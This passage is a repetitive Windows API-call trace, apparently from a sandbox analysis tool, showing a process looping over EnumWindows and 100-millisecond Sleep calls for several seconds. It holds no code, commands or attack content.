[0248.834] Sleep (dwMilliseconds=0x64) [0248.851] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.853] Sleep (dwMilliseconds=0x64) [0248.888] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.890] Sleep (dwMilliseconds=0x64) [0248.908] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.909] Sleep (dwMilliseconds=0x64) [0248.929] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.930] Sleep (dwMilliseconds=0x64) [0248.967] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.968] Sleep (dwMilliseconds=0x64) [0248.979] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.979] Sleep (dwMilliseconds=0x64) [0249.036] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.037] Sleep (dwMilliseconds=0x64) [0249.079] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.080] Sleep (dwMilliseconds=0x64) [0249.093] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.094] Sleep (dwMilliseconds=0x64) [0249.120] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.121] Sleep (dwMilliseconds=0x64) [0249.160] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.161] Sleep (dwMilliseconds=0x64) [0249.210] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.211] Sleep (dwMilliseconds=0x64) [0249.246] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.247] Sleep (dwMilliseconds=0x64) [0249.276] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.277] Sleep (dwMilliseconds=0x64) [0249.287] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.288] Sleep (dwMilliseconds=0x64) [0249.324] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.326] Sleep (dwMilliseconds=0x64) [0249.343] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.343] Sleep (dwMilliseconds=0x64) [0249.366] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.367] Sleep (dwMilliseconds=0x64) [0249.467] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.469] Sleep (dwMilliseconds=0x64) [0249.500] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.518] Sleep (dwMilliseconds=0x64) [0249.567] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.570] Sleep (dwMilliseconds=0x64) [0249.606] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.608] Sleep (dwMilliseconds=0x64) [0249.613] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.614] Sleep (dwMilliseconds=0x64) [0249.651] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.653] Sleep (dwMilliseconds=0x64) [0249.689] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.691] Sleep (dwMilliseconds=0x64) [0249.697] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.698] Sleep (dwMilliseconds=0x64) [0249.732] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.733] Sleep (dwMilliseconds=0x64) [0249.771] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.773] Sleep (dwMilliseconds=0x64) [0249.777] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.778] Sleep (dwMilliseconds=0x64) [0249.814] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.816] Sleep (dwMilliseconds=0x64) [0249.845] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.846] Sleep (dwMilliseconds=0x64) [0249.854] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.855] Sleep (dwMilliseconds=0x64) [0249.890] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.891] Sleep (dwMilliseconds=0x64) [0249.916] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.917] Sleep (dwMilliseconds=0x64) [0249.931] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.932] Sleep (dwMilliseconds=0x64) [0249.969] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0249.971] Sleep (dwMilliseconds=0x64) [0250.020] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.021] Sleep (dwMilliseconds=0x64) [0250.038] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.039] Sleep (dwMilliseconds=0x64) [0250.076] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.077] Sleep (dwMilliseconds=0x64) [0250.093] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.093] Sleep (dwMilliseconds=0x64) [0250.116] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.117] Sleep (dwMilliseconds=0x64) [0250.157] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.180] Sleep (dwMilliseconds=0x64) [0250.208] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.210] Sleep (dwMilliseconds=0x64) [0250.248] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.249] Sleep (dwMilliseconds=0x64) [0250.277] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.278] Sleep (dwMilliseconds=0x64) [0250.287] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.288] Sleep (dwMilliseconds=0x64) [0250.324] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.326] Sleep (dwMilliseconds=0x64) [0250.365] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.366] Sleep (dwMilliseconds=0x64) [0250.372] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.373] Sleep (dwMilliseconds=0x64) [0250.464] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.465] Sleep (dwMilliseconds=0x64) [0250.507] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.508] Sleep (dwMilliseconds=0x64) [0250.552] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.553] Sleep (dwMilliseconds=0x64) [0250.575] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.576] Sleep (dwMilliseconds=0x64) [0250.649] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.651] Sleep (dwMilliseconds=0x64) [0250.680] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.681] Sleep (dwMilliseconds=0x64) [0250.689] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.689] Sleep (dwMilliseconds=0x64) [0250.726] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.728] Sleep (dwMilliseconds=0x64) [0250.766] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.768] Sleep (dwMilliseconds=0x64) [0250.773] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.774] Sleep (dwMilliseconds=0x64) [0250.805] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.806] Sleep (dwMilliseconds=0x64) [0250.843] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.845] Sleep (dwMilliseconds=0x64) [0250.857] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.858] Sleep (dwMilliseconds=0x64) [0250.883] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.884] Sleep (dwMilliseconds=0x64) [0250.920] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.921] Sleep (dwMilliseconds=0x64) [0250.941] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0250.962] Sleep (dwMilliseconds=0x64) [0251.025] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.026] Sleep (dwMilliseconds=0x64) [0251.051] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.052] Sleep (dwMilliseconds=0x64) [0251.064] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.065] Sleep (dwMilliseconds=0x64) [0251.101] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.102] Sleep (dwMilliseconds=0x64) [0251.143] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.144] Sleep (dwMilliseconds=0x64) [0251.151] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.152] Sleep (dwMilliseconds=0x64) [0251.200] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.202] Sleep (dwMilliseconds=0x64) [0251.241] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.243] Sleep (dwMilliseconds=0x64) [0251.256] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.256] Sleep (dwMilliseconds=0x64) [0251.285] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.287] Sleep (dwMilliseconds=0x64) [0251.323] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.325] Sleep (dwMilliseconds=0x64) [0251.334] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.335] Sleep (dwMilliseconds=0x64) [0251.364] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.366] Sleep (dwMilliseconds=0x64) [0251.422] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.423] Sleep (dwMilliseconds=0x64) [0251.447] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.448] Sleep (dwMilliseconds=0x64) [0251.476] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.477] Sleep (dwMilliseconds=0x64) [0251.512] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.514] Sleep (dwMilliseconds=0x64) [0251.518] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.518] Sleep (dwMilliseconds=0x64) [0251.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.553] Sleep (dwMilliseconds=0x64) [0251.598] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.599] Sleep (dwMilliseconds=0x64) [0251.605] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.606] Sleep (dwMilliseconds=0x64) [0251.643] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.644] Sleep (dwMilliseconds=0x64) [0251.682] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.683] Sleep (dwMilliseconds=0x64) [0251.717] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.718] Sleep (dwMilliseconds=0x64) [0251.748] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.749] Sleep (dwMilliseconds=0x64) [0251.756] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.757] Sleep (dwMilliseconds=0x64) [0251.795] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.796] Sleep (dwMilliseconds=0x64) [0251.822] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.823] Sleep (dwMilliseconds=0x64) [0251.833] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.835] Sleep (dwMilliseconds=0x64) [0251.871] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.873] Sleep (dwMilliseconds=0x64) [0251.897] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.899] Sleep (dwMilliseconds=0x64) [0251.912] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.913] Sleep (dwMilliseconds=0x64) [0251.948] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.950] Sleep (dwMilliseconds=0x64) [0251.984] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0251.985] Sleep (dwMilliseconds=0x64) [0252.030] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.031] Sleep (dwMilliseconds=0x64) [0252.074] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.075] Sleep (dwMilliseconds=0x64) [0252.102] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.103] Sleep (dwMilliseconds=0x64) [0252.114] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.116] Sleep (dwMilliseconds=0x64) [0252.151] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.152] Sleep (dwMilliseconds=0x64) [0252.176] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.178] Sleep (dwMilliseconds=0x64) [0252.199] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.201] Sleep (dwMilliseconds=0x64) [0252.236] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.237] Sleep (dwMilliseconds=0x64) [0252.256] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.257] Sleep (dwMilliseconds=0x64) [0252.279] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.281] Sleep (dwMilliseconds=0x64) [0252.316] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.340] Sleep (dwMilliseconds=0x64) [0252.354] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.356] Sleep (dwMilliseconds=0x64) [0252.393] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.394] Sleep (dwMilliseconds=0x64) [0252.426] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.427] Sleep (dwMilliseconds=0x64) [0252.441] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.443] Sleep (dwMilliseconds=0x64) [0252.478] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.479] Sleep (dwMilliseconds=0x64) [0252.507] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.509] Sleep (dwMilliseconds=0x64) [0252.519] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.521] Sleep (dwMilliseconds=0x64) [0252.558] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.559] Sleep (dwMilliseconds=0x64) [0252.584] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.586] Sleep (dwMilliseconds=0x64) [0252.603] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.604] Sleep (dwMilliseconds=0x64) [0252.641] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.642] Sleep (dwMilliseconds=0x64) [0252.665] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.667] Sleep (dwMilliseconds=0x64) [0252.703] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.707] Sleep (dwMilliseconds=0x64) [0252.749] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.751] Sleep (dwMilliseconds=0x64) [0252.784] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.788] Sleep (dwMilliseconds=0x64) [0252.793] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.795] Sleep (dwMilliseconds=0x64) [0252.832] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.833] Sleep (dwMilliseconds=0x64) [0252.876] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.878] Sleep (dwMilliseconds=0x64) [0252.884] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.886] Sleep (dwMilliseconds=0x64) [0252.919] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0252.921] Sleep (dwMilliseconds=0x64) [0253.052] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.054] Sleep (dwMilliseconds=0x64) [0253.087] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.089] Sleep (dwMilliseconds=0x64) [0253.102] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.104] Sleep (dwMilliseconds=0x64) [0253.140] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.142] Sleep (dwMilliseconds=0x64) [0253.183] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.185] Sleep (dwMilliseconds=0x64) [0253.186] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.199] Sleep (dwMilliseconds=0x64) [0253.240] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.242] Sleep (dwMilliseconds=0x64) [0253.279] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.281] Sleep (dwMilliseconds=0x64) [0253.299] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.300] Sleep (dwMilliseconds=0x64) [0253.322] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.324] Sleep (dwMilliseconds=0x64) [0253.384] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.386] Sleep (dwMilliseconds=0x64) [0253.421] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.422] Sleep (dwMilliseconds=0x64) [0253.440] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.441] Sleep (dwMilliseconds=0x64) [0253.478] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.480] Sleep (dwMilliseconds=0x64) [0253.524] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.527] Sleep (dwMilliseconds=0x64) [0253.537] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.539] Sleep (dwMilliseconds=0x64) [0253.572] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.611] Sleep (dwMilliseconds=0x64) [0253.626] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.628] Sleep (dwMilliseconds=0x64) [0253.650] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.652] Sleep (dwMilliseconds=0x64) [0253.690] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.691] Sleep (dwMilliseconds=0x64) [0253.721] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.723] Sleep (dwMilliseconds=0x64) [0253.732] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.734] Sleep (dwMilliseconds=0x64) [0253.769] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.771] Sleep (dwMilliseconds=0x64) [0253.808] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.810] Sleep (dwMilliseconds=0x64) [0253.818] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.819] Sleep (dwMilliseconds=0x64) [0253.847] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.849] Sleep (dwMilliseconds=0x64) [0253.887] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.889] Sleep (dwMilliseconds=0x64) [0253.915] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.916] Sleep (dwMilliseconds=0x64) [0253.929] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.930] Sleep (dwMilliseconds=0x64) [0253.967] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0253.969] Sleep (dwMilliseconds=0x64) [0254.039] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.041] Sleep (dwMilliseconds=0x64) [0254.042] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.043] Sleep (dwMilliseconds=0x64) [0254.080] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.082] Sleep (dwMilliseconds=0x64) [0254.119] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.121] Sleep (dwMilliseconds=0x64) [0254.139] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.141] Sleep (dwMilliseconds=0x64) [0254.272] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.273] Sleep (dwMilliseconds=0x64) [0254.318] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.359] Sleep (dwMilliseconds=0x64) [0254.381] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.382] Sleep (dwMilliseconds=0x64) [0254.402] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.404] Sleep (dwMilliseconds=0x64) [0254.441] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.443] Sleep (dwMilliseconds=0x64) [0254.483] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.484] Sleep (dwMilliseconds=0x64) [0254.491] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.492] Sleep (dwMilliseconds=0x64) [0254.547] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.549] Sleep (dwMilliseconds=0x64) [0254.587] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.589] Sleep (dwMilliseconds=0x64) [0254.592] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.594] Sleep (dwMilliseconds=0x64) [0254.631] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.632] Sleep (dwMilliseconds=0x64) [0254.671] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.672] Sleep (dwMilliseconds=0x64) [0254.679] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.680] Sleep (dwMilliseconds=0x64) [0254.714] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.716] Sleep (dwMilliseconds=0x64) [0254.754] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.756] Sleep (dwMilliseconds=0x64) [0254.760] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.761] Sleep (dwMilliseconds=0x64) [0254.794] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.795] Sleep (dwMilliseconds=0x64) [0254.834] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.835] Sleep (dwMilliseconds=0x64) [0254.839] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.840] Sleep (dwMilliseconds=0x64) [0254.873] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.875] Sleep (dwMilliseconds=0x64) [0254.912] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.914] Sleep (dwMilliseconds=0x64) [0254.926] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0254.953] Sleep (dwMilliseconds=0x64) [0255.016] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.018] Sleep (dwMilliseconds=0x64) [0255.033] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.034] Sleep (dwMilliseconds=0x64) [0255.059] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.060] Sleep (dwMilliseconds=0x64) [0255.096] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.098] Sleep (dwMilliseconds=0x64) [0255.127] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.129] Sleep (dwMilliseconds=0x64) [0255.139] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.141] Sleep (dwMilliseconds=0x64) [0255.178] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.180] Sleep (dwMilliseconds=0x64) [0255.220] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.222] Sleep (dwMilliseconds=0x64) [0255.230] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.232] Sleep (dwMilliseconds=0x64) [0255.272] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.273] Sleep (dwMilliseconds=0x64) [0255.309] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.311] Sleep (dwMilliseconds=0x64) [0255.313] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.314] Sleep (dwMilliseconds=0x64) [0255.401] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.402] Sleep (dwMilliseconds=0x64) [0255.442] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.443] Sleep (dwMilliseconds=0x64) [0255.447] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.449] Sleep (dwMilliseconds=0x64) [0255.486] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.488] Sleep (dwMilliseconds=0x64) [0255.527] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.529] Sleep (dwMilliseconds=0x64) [0255.542] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.543] Sleep (dwMilliseconds=0x64) [0255.569] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.570] Sleep (dwMilliseconds=0x64) [0255.607] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.629] Sleep (dwMilliseconds=0x64) [0255.647] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.648] Sleep (dwMilliseconds=0x64) [0255.686] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.687] Sleep (dwMilliseconds=0x64) [0255.714] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.715] Sleep (dwMilliseconds=0x64) [0255.728] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.730] Sleep (dwMilliseconds=0x64) [0255.766] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.768] Sleep (dwMilliseconds=0x64) [0255.797] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.798] Sleep (dwMilliseconds=0x64) [0255.807] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.809] Sleep (dwMilliseconds=0x64) [0255.845] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.846] Sleep (dwMilliseconds=0x64) [0255.879] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.880] Sleep (dwMilliseconds=0x64) [0255.887] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.889] Sleep (dwMilliseconds=0x64) [0255.928] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.929] Sleep (dwMilliseconds=0x64) [0255.968] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.970] Sleep (dwMilliseconds=0x64) [0255.971] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0255.972] Sleep (dwMilliseconds=0x64) [0256.045] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.047] Sleep (dwMilliseconds=0x64) [0256.088] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.089] Sleep (dwMilliseconds=0x64) [0256.098] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.099] Sleep (dwMilliseconds=0x64) [0256.130] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.132] Sleep (dwMilliseconds=0x64) [0256.172] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.174] Sleep (dwMilliseconds=0x64) [0256.196] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.198] Sleep (dwMilliseconds=0x64) [0256.262] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.263] Sleep (dwMilliseconds=0x64) [0256.289] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.290] Sleep (dwMilliseconds=0x64) [0256.305] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.307] Sleep (dwMilliseconds=0x64) [0256.347] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.349] Sleep (dwMilliseconds=0x64) [0256.374] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.375] Sleep (dwMilliseconds=0x64) [0256.390] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.431] Sleep (dwMilliseconds=0x64) [0256.469] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.471] Sleep (dwMilliseconds=0x64) [0256.516] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.517] Sleep (dwMilliseconds=0x64) [0256.520] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.522] Sleep (dwMilliseconds=0x64) [0256.560] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.564] Sleep (dwMilliseconds=0x64) [0256.603] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.605] Sleep (dwMilliseconds=0x64) [0256.625] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.626] Sleep (dwMilliseconds=0x64) [0256.647] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.649] Sleep (dwMilliseconds=0x64) [0256.686] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.687] Sleep (dwMilliseconds=0x64) [0256.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0256.709] Sleep (dwMilliseconds=0x64) [0256.716] EnumWindows (lpEnumFunc=0x423dd0, 